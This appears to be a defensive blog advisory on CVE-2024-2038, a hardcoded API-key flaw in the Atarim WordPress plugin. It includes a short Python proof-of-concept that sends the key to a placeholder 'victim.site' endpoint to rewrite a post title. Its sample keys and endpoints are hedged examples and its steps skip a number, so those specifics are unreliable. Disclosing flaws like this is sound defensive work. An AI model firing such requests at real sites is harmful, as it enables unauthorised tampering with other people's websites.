The WordPress plugin Atarim: Visual Website Collaboration, Feedback & Project Management is widely used by web agencies, designers, and project managers to streamline visual feedback and project management on websites. But if you’re using any version of the Atarim plugin up to and including v3.22.6, your site is at serious risk due to a critical vulnerability now tracked as CVE-2024-2038.
In this post, we’ll break down:
What is CVE-2024-2038?
CVE-2024-2038 is a severe security issue in the Atarim plugin caused by the use of hardcoded credentials for API authentication. All versions up to 3.22.6 are affected.
What does this mean?
The plugin’s API allows certain privileged operations—like editing content, changing plugin settings, and uploading images. It should check to make sure that only legitimate, authenticated users can perform these actions. However, due to the use of static (hardcoded) access tokens or API credentials, anyone who knows or can guess the credentials can make these privileged API calls.
Because these credentials are hardcoded and the code is installed on every website using Atarim, attackers can programmatically attack any vulnerable site on the internet using the same shared credentials.
Impact:
The Atarim plugin registers several API endpoints, for example
/wp-json/v3/feedback/update
/wp-json/v3/feedback/delete
/wp-json/v3/feedback/settings
These should be restricted, but the plugin only checks if the incoming requests include static access credentials, e.g.:
$api_key = 'atarim_hardcoded_api_key_123456';
if ($_REQUEST['api_key'] !== $api_key) {
wp_send_json_error('Unauthorized', 401);
}
Unfortunately, the api_key is the same for everyone, and it's present in the code or easily discoverable.
So if a malicious user sends a request with the right key, they’re treated as fully authorized! No login, no authentication, no user role checks.
Step 1: Find the Endpoint
Let’s say a site https://victim.site uses Atarim.
The vulnerable endpoint might be:
https://victim.site/wp-json/v3/feedback/update
Say, in the plugin's PHP files, you find
define('ATARIM_API_KEY', 'atarim_key_2023');
Step 3: Craft a Malicious Request
A simple HTTP POST with the right API key is all it takes. Here’s an example Python script to change a post title (assuming post ID 123):
import requests
TARGET = "https://victim.site"
ENDPOINT = "/wp-json/v3/feedback/update"
API_KEY = "atarim_key_2023" # Example hardcoded API key
payload = {
'api_key': API_KEY,
'post_id': 123,
'post_title': 'Hacked by CVE-2024-2038'
}
r = requests.post(f"{TARGET}{ENDPOINT}", data=payload)
print("Status:", r.status_code)
print("Response:", r.text)
Step 4: Check the Result
If the site is vulnerable, the post title is changed without any real authentication.
References and Further Reading
- WPScan Vulnerability Database - Atarim
- NVD - CVE-2024-2038
- Plugin Homepage
- Atarim Changelog & Security Notices
How to Fix & Protect Yourself
- IMMEDIATELY UPDATE: If you use Atarim, update to the latest version (3.22.7 or higher at time of writing) where proper authentication is enforced.
- Check site for malicious changes: Review WordPress posts, settings, and media uploads for suspicious activity.
- Block API endpoints: Use your WAF, firewall, or .htaccess to block access to /wp-json/v3/feedback/* for non-logged-in users.
- Monitor for unusual admin/API activity.
Conclusion
CVE-2024-2038 is a prime example of why “hardcoded secrets” in software are dangerous. Anyone can use the static key, taking over your website via the Atarim plugin’s API. If you run WordPress with Atarim, it’s urgent to update now, review your site, and consider extra monitoring.
Stay safe, always update your plugins, and audit your API endpoints!
*If this was helpful, consider sharing to help others stay secure!*
Note: This post is informational and hands-on for educational and defensive use by site owners and penetration testers. Do not attack sites you don't own or have explicit written permission to test.
Timeline
Published on: 05/23/2024 07:15:08 UTC
Last modified on: 08/01/2024 18:56:22 UTC